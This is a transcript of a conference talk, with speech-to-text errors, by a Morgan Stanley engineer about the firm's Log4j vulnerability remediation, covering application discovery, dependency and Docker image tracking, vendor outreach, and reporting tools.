Log4j Hygiene

Investigating log4j vulnerabilities within the Morgan software real estate.


Leveraging various tools to scan and provide reports for remediation. The ideas and tools are neither log4j specific, nor Morgan Stanley specific.

PF

Paul Fox

Distinguished Engineer, Executive Director Institutional Securities Tech, Morgan Stanley

Transcript

00:00:12

Welcome to this presentation on log four, Jade vulnerability, uh, and the remediation exercise that took place in Morgan Stanley since the middle of December, 2021. During the course of this exercise, I estimate about 40,000 pieces of work were executed and that no animals were harmed during this production. So, quick table of contents, who are I? Morgan Stanley. Some information about LCL J in case you're not aware of what it is. Some comments by Gene Kim when we had a pre presentation discussion and a little bit of the story as it unfolded internally, and many of the interesting aspects of the questions and issues that arose during the exercise of discovering data and remediating.

00:01:05

So, who am I? I am, I've been at Morgan Stanley for more than 20 years working in production plants, engineering, configuration management, and many tools. And really with an interest in root cause analysis, why, why do things go wrong? And when something goes wrong, what's the chance of it happening again? And again, it fits quite nicely and squarely with things like vulnerability management and, uh, software quality. I work with many people solving some of these problems, trying to understand them, helping people out with career aspirations, talent spotting, so hopefully a general or random, an interest in software quality security licensing standards. They're all very similarly related items about software. What is it made of? What are the components? And, uh, applicability to the application With such a vast software real estate in the organization, it opens itself up to a lot of data mining with some very interesting patterns become apparent due to the many years of software and many types of software that ongoing in such a large organization.

00:02:17

And really all of these things eventually culminate in some of the big ticket items. So, struts from a few years ago, the big Equifax issue piece of open source now as of a few months ago in log four J. And these are escalating in terms of number, frequency and severity. So H two spring, spring for Shell and others. So with all of this experience, all these tools, it's gotta be easy. It's not as easy as it would at first appear. Okay, so before we go into the details, let's talk about Morgan Stanley. It's an investment bank. More than a hundred thousand employees, 20,000 plus developers, 25 years of software, new old legacy. Pretty much every technology ever and over the last many years has embraced, uh, continuous integration pipelines, DevOps, agile, all of the buzzwords to help improve software quality and improved throughput and velocity.

00:03:18

We have our own bad practices like everybody. We're an attack victim at the nature of our business, and lots of data and lots of dollars. We're proud of what we do, like everybody. And millions of dollars of trades and money moves through all the machinery every day. That's millions of trades and so much complexity. So this means we've got a lot of diversity in terms of software. Generally, people don't like to work on legacy. They like to work on the latest and greatest things developers want to develop, not fix things, and, uh, more use of open source industry standards, which leads to more surface area. So as technologists, we consider ourselves to work for an IT company that helps to sell stocks and shares as a business. The traders think of us as a bank, and it is just a tool. So we have a diversity of opinion or approach to doing things, and cyber is happening more often with more impact, more eyes, more effort by the bad guys. We, like all organizations, are a target. We don't want to be in the headlines for the wrong reasons.

00:04:31

Just a brief recap on Log for J if you're not aware of it, it's a hugely popular logging library used by many almost Java applications. It has a long history, pretty much most applications use it. The recent publicity of a vulnerability got the maximum score from the people who rate and grade these things. It basically allows, um, a remote code execution, which basically means if you've got an external web facing Java application, uh, the user could sit there and type in the right magic characters in order to download code and execute it on your systems. Obviously not a good thing to have happen, and because many Java applications tend to be web-based services that is even worse sat in the wild for years until it was uncovered. And so even before publication, I, I guess the bad actors were busy writing the tools to start scanning the world, um, attack or investigate every website in the world and every organization, uh, big, small word very quickly after the public announcement to investigate or remediate or block these attacks, the attack itself turned out to be very easy and had very little in terms of precondition.

00:05:47

So if you read the internet guides on this, it shows how simple it is to, to do this. So the mere presence of the JAR file in an application is enough to presume that the application is at risk of attack. I guilty. So the lock lock for J story within Morgan Stanley, I like to think of it as the beginning and middle and an end. It's started for myself one Friday morning with some emails that were coming in and me trying to figure out what I'm gonna do for the day. The subsequent days and weeks were a lot of concentrated work by many teams and people collecting data, interpreting and getting the message out and getting accountability for application remediation. And then as we get to the end of the exercise, interesting things come around. At some point the company wanted to take a firm decision that we are going to destroy the copies of software in the organization knowing that nothing was using it. So that required a lot of more analytics and discussion in order to figure out, are we ready? Uh, have we got all the data and signs that we need?

00:07:04

I had a conversation with Jean TM before doing this presentation, and it was an interesting, um, conversation we had because I guess to an outsider renovating or remediating, this issue is really very simple. There is vulnerability in the library, just fire off an email to everybody and tell 'em to go fix it. I said it wasn't as simple as that. Uh, that's, that's the high level goal. You want people to go and fix it. So how many ways are there for it to go wrong? If you did happen to take that approach, maybe in a small organization that's viable, but in a very large organization, you really want to be confident that you've covered all your bases. All applications are, um, properly remediated, investigated, and that you don't have legacy sitting in the corner somewhere that everybody's forgotten about that is open to attack. So do you know all the applications you have?

00:08:02

Do you know who owns them? Who's accountable in a large organization? That data is changing as people come and go and, and all sorts of things happen. How many are going to understand the email and actually respond? Uh, people are busy doing the day job. You are now asking 'em to do some high priority thing. And, uh, for all of us on the exercise, it's a lot of learning to understand the nuances. Wherever the answers are that may come back, do you trust them? So an example is an, an application team may say, we looked at our, our code. There is no log four J. Do you trust that answer? The answer for myself is no. If the, the data, the tools, the probes that exist in our organization demonstrate that it is using the technology, even if the application owner doesn't believe it is, we need to trust the tools and, and the data that's being collected, whether you use Log four J or not, it's not necessarily obvious. The layering of software components and libraries can mean that maybe one of the components that you are using it itself is using Log four J and you need to remediate that component. So it's either a direct dependency or a a, an indirect dependency or transitive dependency that can get quite complicated For application owners who may not actually be very familiar with their application, their own application.

00:09:24

Lack of proof means you're still susceptible to an attack. The bad guy doesn't care how good or bad or internal processes are, they can just fire off a script and demonstrate that good an application weakness. We don't want to be in that situation where we believe we've done a good job and provably we haven't tracking hundreds or even thousands of remediations based around some honor system has too many weak spots. People believe to the best of their knowledge on the results. And asby, you, you, you <inaudible> to keep track of everything going on. And occasionally you need to re we re-question everybody because maybe some of the boundary conditions changed. So in the beginning it was a quiet fire, try and getting ready to wind down for Christmas and an email asking for details on applications using log four JI held into my tool, my tool and sent out a quick reply, reply with this link, help yourself, and then another email arrived and another.

00:10:26

So I started thinking by the time multiple emails are coming in, that tends to indicate high severity and started reading up on the issue. And yeah, it was a big one. So fundamentally the questions that everybody's asking at the beginning of this exercise is, what is our exposure? Which applications are impacted? And the answer generally speaking, is all of them or most of them, which is a very vague answer, and that is not a good answer unless you can answer the question very scientifically. It's going to be a bad day, bad week, bad month. Now, most of what I'm talking about here is a personal view, but behind this is teamwork. Cross silo, cross division get getting anyone and everyone to do whatever it takes to get results. We have two key technologies in the firm, which can help answer these questions. One is called a FS, the Android file system.

00:11:24

It's a globally distributed network where all the applications reside, and we have our continuous integration system called train where all software is built and deployed. And a bit of footnote there that the word all doesn't mean whatever you think it means. It's nice to say all of our software is built on an SDLC approved continuous integration process, but not all software that is built by Morgan Stanley. We have external vendor applications, legacy applications, things that just are not doing the right thing. So we need to be cautious when we consult these systems. And I've deliberately simplified in mentioning a FS and Trane because we have other pieces of technology for deploying applications such as Docker, which adds more complexity to the question and answer.

00:12:18

So it was Christmas or nearly Christmas and the meetings have started, uh, the initial meetings were getting lots of people together to try and understand the gravity of what this issue is. What is the first steps in remediating? I would probably to describe at the beginning of an exercise, it's all very opaque. Uh, we don't understand the impact, the true impact of what the vulnerability is. We don't understand how many applications we are, probably all guessing how long it's going to take to remediate the one, the, the tens the hundreds and thousands of applications. So many meetings started happening within the first few hours and the next probably for the, the next week, regular meetings, status updates, what are we doing? What are we collected, where are we going? And that built up a strong hierarchy and a strong sense of presence by those concerned senior management, the cyber team, the hunt team, the the software developers and, and and many other people.

00:13:25

We in, in looking at all of the applications, primary focus was on anything that's external facing. Anything that could be attacked from Morgan stanley.com is a very high priority. And anything that is a vendor application, something not built by Morgan Stanley would be also of high interest because somebody needs to reach out to the and find out what are they doing, are they issuing a patch? So suddenly a lot of work was going on. Whilst most software in the firm is built internally sits on our CI system and we have data catalogs, uh, that, that let us know which applications may be impacted. I decided to go off, um, at a tangent and start looking at the external applications and, and see what evidence was existed to demonstrate they're using Log four J. So this leads to a series of questions. Really, what is a vendor based application?

00:14:22

What is a vendor system? How do we catalog these? Are they correctly cataloged? What can we tell by inspection of the applications? Generally speaking, we do a good job of cataloging the applications, um, because that data is used in so many different ways internally, but if an external application was not marked as an external or a vendor application, that might mean we skip over it. We may not notice, uh, that we don't have the metadata to tell us whether it uses lock for J or not. We wouldn't know what to do. So that's a very important part of the exercise is are the catalogs up to date? Are we trustworthy In starting to look at the vendor applications, um, there was definite signs of the offending versions of lock four J. So that was very useful and confirm that we could det detect them. We couldn't tell whether the application was vulnerable. So merely using the software doesn't necessarily imply the application is vulnerable, but it's a very strong likelihood in parallel to the sort of data gathering and and analysis, vendor engagement was taking place. So this is an interesting item in, in a large organization deals with many businesses, some big, some small, the IBMs, the Oracles, the uh, software components, business cloud, whatever turns out in the company of our size, we deal with tens of thousands of organizations that supply everything from simple little laborers to major applications.

00:15:55

So they needed to reach out to the vendors in order to, uh, find out what their take was on mitigation or remediation. And although it had nothing to do with that, it was just interesting watching it because this culminated in thousands of emails being sent out, asking for responses by the, the application companies. Also, bearing in mind we are a, a regulated industry, the regulators were contrast in understanding what our exposure was. So trying to pull this data together, whether it's the conversations with external vendors or internal applications required responses to the regulators about where we were in the, in the discovery process.

00:16:39

Whilst we were busy trying to contact the companies that supply us with software, of course our clients were busy trying to contact us. How is Morgan Stanley doing? Are we impacted? What, what's our response? What, where are we? One can imagine the torrent of incoming and outgoing traffic and communication required. Careful management. Certainly those of us on the technical side, were not spoke spokespeople for the organization. Luckily people don't reach out to us to ask for our our opinion on what's going on. But managing that communication in, in a mature fashion is, uh, you know, quite something else.

00:17:18

Okay, so on the tech technical side, we ended up creating a repeatable process. Um, we're not only discovering the applications, we need to provide the information to the application owners and, and to the, uh, people monitoring the situation in the firm. This is not something you want to do by hand collecting spreadsheets, merging data, you need to have an automation system that can collect this stuff and generate reports and map free us up for humans to get on with it. Knowing we would need to track this to zero. So this was not, um, a desirable program. This was a mandatory program. We needed to eradicate this. So this was gonna stick around for a while until all the due diligence remediation had happened. This basically entailed a load of standard report generation and data acquisition, a lot of caching. I was writing a lot of the tooling and having a report that takes more than 24 hours to generate results is not really desirable.

00:18:13

So a lot of work was put into ensure it could run reasonably fast. So the plausible data is what's running, what are the applications? What are the processes? What source code has Russian assist to these excursions of log for J? What images exist? What old releases exist and need to be destroyed? We really wanted to ensure that no old application prior to remediation could suddenly be fired up because that would reintroduce the vulnerability into the ecosystem. It's a multidimensional view to help isolate the applications and owners, not just for remediation, but accountability. And, and one of the interesting things that happened at the beginning of the exercise was, which is the correct version of log fragility to use? And in the early days of this remediation exercise, the Apache Foundation were really seeing brand new releases. Subsequently, they were found to have vulnerabilities. And so the versioning kept changing daily, trying to keep it in your head was beca becoming impossible? So we needed a central place that would catalog what are the bad versions, what are the good versions that are acceptable?

00:19:20

A lot of the early work was about senior management and, uh, data collecting, but ultimately this data is all meant for the developers to remediate apps. They had no idea this was going to hit them in the couple of weeks just before Christmas. And a lot of communication, education and knowledge needed to be disseminated to get people, um, to the same level of understanding. The program itself was split into a tactical, uh, and strategic approach. So highest priority applications needed to be fixed prior to the Christmas time. So that's about a two week timeframe and then slightly more measure in 2022 as post-Christmas post New Year. And that worked really well to focus on getting early results, proving the methodology and, and then following through in, in January, the next months turned into the next few weeks, turned into months whilst the original goal was full remediation by, by the end of sort of January timeframe, things just tend to take a little bit longer than uh, expected. So this presentation, which is dated in May, we've pretty much reached the end of the line that the remediation has completed, but that happened sometime in April.

00:20:35

So what are some of the support questions that happened along the way? One of the most interesting ones I've, I saw in my inbox was why is my net application showing up in the report? And the answer turned out to be there was, it was a dotnet application that didn't use Java. The docker image in which it was running had a Java component and that Java component had an issue. There was a lot of conversations and questions around docker images. Once we identified the family of images that had the lock for J in there that needed to be rebuilt and destroyed. It turns out that nobody actually knew how to destroy one. Um, the use of Docker technology within the firm is relatively new in the last few years and nobody did really give much thought to scale at scale deletion of them. So a lot of conversations went on with the Docker team to educate everybody how to do the deletion and, and handle some bugs which nobody had seen before.

00:21:31

In doing that, another issue was people remediating things and saying, why am I still on the report? So the report is pulling in data, which is often a few days out of date, so it can take a few days for things to drop off. Trying to explain this to people time and time again is really difficult, but it did highlight later on in the the workflow that as people were remediating, they really wanted hard real time, uh, updates to the spreadsheet. They knew they were accountable and they wanted the, the positive feedback that they had been dropped from the report to me as an implementer of some of this tooling demonstrated that as you get closer to the finishing line, the demand for hard real-time data increases and the technical implementation of that gets much more complicated. So if you're generating a report and the data is a few days, a few weeks out of date, you have people okay with that.

00:22:24

But when people want the data within 24 hours or less, the tool needs to do more polling, more probing, more computation, and that is actually quite a stretch. Now I'm aware that we're running out of time, unfortunately in this presentation, so I'm gonna have to fast forward over the subsequent side slides. One of the interesting facets of this uh, investigation is whilst they spend a lot of time early on generating the raw data for people to consume, somebody put together, uh, a web service built out of bash shell of all things to help people query the data. And I thought it was really innovative and very useful tool that I was very, uh, proud to see that somebody had spent the time to do that. Uh, and I actually took that code and then enhanced it manyfold over because having a central portal that people could go to rather than people emailing spreadsheets that would inevitably be days out of date by the time you're looking at them, being able to look at the live data at at the point it's being consumed and, and generated, turned out to be really useful, and that this system is being reused for other vulnerabilities and other hygiene exercises.

00:23:34

So out of the chaos that ensued of Log four J, we've built a data collector that's reusable for other vulnerabilities, but also the end user experience is now the same. And, uh, a lot of smart features are available in this system. What are some of the takeaways in this whole exercise? I've listed a whole bunch of things. In the heat of the moment when you're trying to generate data, everybody's looking at it, everybody's asking questions, there's a lot of similarity no matter the organization or the problem generator report and, and people nce it. Um, but then people start asking, what does this column mean and and why is that road there? I'll just stick for the moment with the very bottom, um, item, which is focus on success, not failure. We have thousands of line items that needed to be fixed and people were being hounded because they still had one thing they left to do.

00:24:29

Even if they'd fixed 99, the one thing that was left, uh, was being the, the main focus. Being able to show the positive work that people were doing can make us all feel good as technologists, that people are actually doing what they're being asked to do and you, whereas senior management may focus on, has the risk been eradicated? We need to be fair to the effort thrown at this by the developer teams. So my apologies, I've run outta time and I'd love to talk about this for much, much more, but I'm going to have to terminate here. So thank you all very much for your time and I hope to speak to you in person at some point in the future.